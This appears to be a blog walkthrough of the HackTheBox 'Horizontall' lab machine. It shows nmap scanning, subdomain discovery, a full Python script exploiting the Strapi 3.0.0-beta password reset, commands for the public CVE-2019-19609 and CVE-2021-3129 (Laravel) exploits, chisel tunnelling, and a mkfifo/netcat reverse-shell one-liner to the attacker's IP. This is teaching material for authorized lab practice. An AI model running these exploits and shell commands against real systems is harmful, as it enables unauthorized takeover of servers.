Press "Enter" to skip to content

HTB Walkthrough : Horizontall

pentestsky

Last updated on March 1, 2022

Today we are going to solve an another challenge from HackTheBox named “Horizontall” . This box is based on strapi which is next-gen headless CMS, open-source, JavaScript, enabling content-rich experiences to be created, managed and exposed to any digital device, so without wasting too much time let start the journey .

Level : Medium

Attacking Strategy

  • Network Scanning
    • Nmap
  • Enumeration
    • Sub-Domain
    • Strapi Enumeration
  • Exploitation
    • strapi JWT
    • strapi 13.0.0 RCE (CVE-2019-19609)
  • Privilege Escalation
    • Port Forwarding
    • Chisel
    • Laravel Exploitation (CVE-2021-3129)

Walkthrough

IP Address : 10.129.168.142

We start with Nmap scan which revels some open port like port 22 and port 80 . Nmap also show some redirection on port 80 with “horizontall.htb” domain so we make changes in our /etc/hosts file to make the route .

nmap -p- -sC -sV --min-rate 10000 -oN nmap 10.129.168.142
# Nmap 7.91 scan initiated Mon Aug 30 13:21:03 2021 as: nmap -p- -sC -sV --min-rate 10000 -oN nmap 10.129.168.142
Nmap scan report for 10.129.168.142
Host is up (0.51s latency).
Not shown: 65332 filtered ports, 201 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
|   256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_  256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Did not follow redirect to http://horizontall.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Once we successfully make the changes in our hosts file and visit the domain so there is some simple website on which most of the links are dead , after running the content discovery nothing is listed .

So next step is to manually enumerate the website , after firing up the inspect element we see some JavaScript file in which new domain is listed “api-prod.horizontall.htb” .

Its time to make the changes on our hosts file so that traffic can route to the website . From this result we get to know that Virtual Hosting is done on this machine . When we visit the domain its some kind of API things with “Welcome” message .

so from past experiences try some pages like admin,roboots.txt,etc luckily there is admin page on which we get the information about running CMS which is “StrApi” CMS . After reading some documentation about the CMS we get the URL to check the Running Version of CMS .

Version

http://api-prod.horizontall.htb/admin/strapiversion

From the Query Strapi version 3.0.0 is running and after doing some google and on CVE-Details it list out some vulnerability for this version .

Exploitation

Now its time to exploit the service , after doing some research we got the exploit on GitHub but this exploit require the JWT for that we need to get access the admin account and this CMS is also vulnerable to Password Reset . Now here for some time we stuck but after doing some research we are able to get the JWT by running simple exploit . Now for working of this exploit we need email so when we visit forget page it ask for email so we try some default email addresses like [email protected],[email protected] but when we try [email protected] the website taking too much time for response so by may be this is the valid email which we can try .

import requests
import sys
import json
 
args=sys.argv
 
if len(args) < 4:
    print("Usage: {} <admin_email> <url> <new_password>".format(args[0]))
    exit(-1)
 
email = args[1]
url = args[2]
new_password =  args[3]
 
s  =  requests.Session()
 
version = json.loads(s.get("{}/admin/strapiVersion".format(url)).text)
 
print("[*] Detected version(GET /admin/strapiVersion): {}".format(version["strapiVersion"]))
 
#Request password reset
print("[*] Sending password reset request...")
reset_request={"email":email, "url":"{}/admin/plugins/users-permissions/auth/reset-password".format(url)}
s.post("{}/".format(url), json=reset_request)
 
#Reset password to
print("[*] Setting new password...")
exploit={"code":{}, "password":new_password, "passwordConfirmation":new_password}
r=s.post("{}/admin/auth/reset-password".format(url), json=exploit)
 
print("[*] Response:")
print(str(r.content))

If we read the exploit so there are some argument to be pass i.e. email address , URL, password . For this case “Email : [email protected]” “URL: http://api-prod.horizontall.htb” “Password : Password123” and we got the JWT , so now its your choice to make the login or direct exploit , here direct exploit.

python get_JWT_exploit.py [email protected] http://api-prod.horizontall.htb Password123
[*] Detected version(GET /admin/strapiVersion): 3.0.0-beta.17.4
[*] Sending password reset request...
[*] Setting new password...
[*] Response:
{"jwt":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjMwNDA5MTA2LCJleHAiOjE2MzMwMDExMDZ9.oVnuPDQP9RbdbdRns2SgF-Uy7xgci0LmVyNwR74mZ5Y","user":{"id":3,"username":"admin","email":"[email protected]","blocked":null}}

Time to get the shell exploit is available on GitHub so we clone it give the execution permission and run it .

git clone https://github.com/dasithsv/CVE-2019-19609.git
cd CVE-2019-19609
ls
chmod +x exploit.py
# python exploit.py <rhost> <jwt> <url> 
python exploit.py api-prod.horizontall.htb 10.10.14.71 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjMwMzM5Mjg0LCJleHAiOjE2MzI5MzEyODR9.1srDKN--euuzhW9cAFoRMzFeqD6-pMMB5cXMoKzqY3Q http://api-prod.horizontall.htb/ 

once the exploit is successful we got the the netcat reverse shell on port 9001 with strapi user rights.

Privilege Escalation

Now we have the shell its time to get the escalated account . In this lab while enumerating SUID , Sudoers nothing is listed so we try to check the netstat result for any running services on local host and we found some of them like MSQL is running on port 3306 and two more ports are open 8000 and 1337 . By default when we setup the MSQL connection is locally listen so next target is port 8000 for that we simply do the port forwarding by using the chisel tool which is an open source project . we transfer the binary to target machine and then run the server and client .

netstat -tlnp
#On target Side i.e. here strapi
./chisel client 10.10.14.71:8001 R:5000:127.0.0.1:8000
#On Attacker Side i.e. Kali Machine 
./chisel server -p 8001 --reverse

Once the client is connected to the server and we easily make the request on localhost at port 5000 and here Laravel v8 is hosted .

Again by taking the help of google we find out some CVE on cvedetails which show some vulnerability on Laravel .

After doing some research we found the CVE-2021-3129 exploit on GitHub . So we clone it and simply run it.

git clone https://github.com/nth347/CVE-2021-3129_exploit
cd CVE-2021-3129_exploit
chmod +x exploit.py
./exploit.py http://localhost:5000 Monolog/RCE1 id

Finally we have the root access to get the proper shell we simply execute the netcat reverse shell and collect the user flag and root flag.

./exploit.py http://localhost:5000 Monolog/RCE1 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.71 1234 >/tmp/f"

References

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.